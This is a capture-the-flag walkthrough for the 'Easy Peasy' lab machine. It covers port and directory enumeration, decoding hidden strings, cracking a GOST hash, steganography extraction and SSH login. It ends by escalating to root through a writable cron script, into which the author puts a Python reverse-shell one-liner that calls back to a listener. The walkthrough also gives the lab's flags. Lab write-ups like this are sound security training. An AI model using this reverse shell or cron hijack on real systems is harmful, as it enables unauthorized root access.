From aldeid
Jump to navigation Jump to search

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

[Task 1] Enumeration through Nmap

Deploy the machine attached to this task and use nmap to enumerate it.

#1.1 - How many ports are open?

Running a simple Nmap scan is not enough to detect all open ports since 2 services are not part of the standard ports. You’ll need to run Nmap with the -p- flag to discover the 3 running services:

80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))

Answer: 3

#1.2 - What is the version of nginx?

Nmap reveals the version of Nginx (with the -sV flag):

Answer: 1.16.1

#1.3 - What is running on the highest port?

Answer: Apache

[Task 2] Compromising the machine

Now you’ve enumerated the machine, answer questions and compromise it!

#2.1 - Using GoBuster, find flag 1.

Using gobuster against the Nginx service running on port 80/tcp allows the discovery of a /hidden directory:

[email protected]:/data/Easy_Peasy/files$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/08/24 10:08:01 Starting gobuster
/hidden (Status: 301)
Progress: 70867 / 220561 (32.13%)^C
[!] Keyboard interrupt detected, terminating.
2020/08/24 10:14:00 Finished

Further enumerating this directory leads to a /hidden/whatever/ location:

[email protected]:/data/Easy_Peasy/files$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt ===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/08/24 10:46:55 Starting gobuster
/index.html (Status: 200)
/whatever (Status: 301)
2020/08/24 10:47:34 Finished

The analysis of the source code reveals a hidden paragraph with an encoded string:

[email protected]:/data/Easy_Peasy/files$ curl -s
<!DOCTYPE html>
<title>dead end</title>
    body {
    background-image: url("");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>

The string is base64 encoded:

$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d

Answer: flag{f1rs7_fl4g}

#2.2 - Further enumerate the machine, what is flag 2?

For the second flag, we’ll jump to the other web service running on port 65524/tcp. There is a robots.txt file that discloses a hash:

[email protected]:/data/Easy_Peasy/files$ curl -s
Robots Not Allowed
This Flag Can Enter But Only This Flag No More Exceptions

Using online resources, we can crack the hash.

Answer: flag{1m_s3c0nd_fl4g}

#2.3 - Crack the hash with easypeasy.txt, What is the flag 3?

The main page shows a standard Apache page, but hints have been hidden in the source code of that page:

[email protected]:/data/Easy_Peasy/files$ curl -s | grep flag
          <a href="#flag">hi</a>
                           Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}

Answer: flag{9fdafbd64c47471a8f54cd3fc64cd312}

#2.4 - What is the hidden directory?

Still in the source code of the main page, we can find a hidden paragraph with an encoded string.

[email protected]:/data/Easy_Peasy/files$ curl -s | grep hidden
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>

It decodes to /n0th1ng3ls3m4tt3r with base62.

#2.5 - Using the wordlist that provided to you in this task crack the hash. what is the password?

Hint: GOST Hash john –wordlist=easypeasy.txt –format=gost hash (optional Delete duplicated lines,Compare easypeasy.txt to rockyou.txt and delete same words)*

Browsing the location gathered previously reveals a hash:

[email protected]:/data/Easy_Peasy/files$ curl -s
<title>random title</title>
    body {
    background-image: url("");

<img src="binarycodepixabay.jpg" width="140px" height="140px"/>

Let’s crack this hash with John the Ripper using the wordlist provided in the challenge (easypeasy.txt)

[email protected]:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
[email protected]:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Answer: mypasswordforthatjob

#2.6 - What is the password to login to the machine via SSH?

The page found just previously also contains a jpg file. Let’s download the picture and decrypt the secret with steghide using the password cracked just before (mypasswordforthatjob):

[email protected]:/data/Easy_Peasy/files$ wget
[email protected]:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg 
Enter passphrase: 
wrote extracted data to "secrettext.txt".
[email protected]:/data/Easy_Peasy/files$ cat secrettext.txt 
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

This file gives us a username (boring) and a binary encoded password, which decodes to iconvertedmypasswordtobinary (you can use Cyberchef to decode it).

#2.7 - What is the user flag?

Let’s connect as boring against the SSH service running on port 6498/tcp.

$ ssh [email protected] -p 6498
**        This connection are monitored by government offical          **
**            Please disconnect if you are not authorized          **
** A lawsuit will be filed against you if the law is not followed      **
[email protected]'s password: 
You Have 1 Minute Before AC-130 Starts Firing
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
[email protected]:~$ ls -la
total 40
drwxr-xr-x 5 boring boring 4096 Jun 15 12:42 .
drwxr-xr-x 3 root   root   4096 Jun 14 16:04 ..
-rw------- 1 boring boring    2 Aug 24 02:37 .bash_history
-rw-r--r-- 1 boring boring  220 Jun 14 16:04 .bash_logout
-rw-r--r-- 1 boring boring 3130 Jun 15 12:42 .bashrc
drwx------ 2 boring boring 4096 Jun 14 16:06 .cache
drwx------ 3 boring boring 4096 Jun 14 16:06 .gnupg
drwxrwxr-x 3 boring boring 4096 Jun 14 22:36 .local
-rw-r--r-- 1 boring boring  807 Jun 14 16:04 .profile
-rw-r--r-- 1 boring boring   83 Jun 14 16:32 user.txt
[email protected]:~$ cat user.txt 
User Flag But It Seems Wrong Like It`s Rotated Or Something

We have found the user flag but it has been ROT’ed. It decodes to flag{n0wits33msn0rm4l} in ROT13 (use Cyberchef to decode it).

Answer: flag{n0wits33msn0rm4l}

#2.8 - What is the root flag?

The user is not in the sudoers but there is a cron job executed by root:

[email protected]:~$ sudo -l
[sudo] password for boring: 
Sorry, user boring may not run sudo on kral4-PC.
[email protected]:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *    * * *   root    cd /var/www/ && sudo bash

The file is owned by our user, we can modify it.

[email protected]:~$ ls -l /var/www/ 
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/
[email protected]:~$ cat /var/www/ 
# i will run as root

Let’s edit the script with nano (vim is not installed on the target), and add a reverse shell:

[email protected]:/var/www$ nano 
[email protected]:/var/www$ cat 
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'

On the client side, we open a listener, and after a short while, we have a privileged reverse shell:

[email protected]:/data/Easy_Peasy/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 55704
bash: cannot set terminal process group (1741): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www# whoami
[email protected]:/var/www# cd /root
cd /root
[email protected]:~# ll
total 40
drwx------  5 root root 4096 Jun 15 12:40 ./
drwxr-xr-x 23 root root 4096 Jun 15 01:08 ../
-rw-------  1 root root    2 Aug 24 02:47 .bash_history
-rw-r--r--  1 root root 3136 Jun 15 12:40 .bashrc
drwx------  2 root root 4096 Jun 13 15:40 .cache/
drwx------  3 root root 4096 Jun 13 15:40 .gnupg/
drwxr-xr-x  3 root root 4096 Jun 13 15:44 .local/
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15 01:01 .root.txt
-rw-r--r--  1 root root   66 Jun 14 21:48 .selected_editor
[email protected]:~# cat .root.txt
cat .root.txt

Answer: flag{63a9f0ea7bb98050796b649e85481845}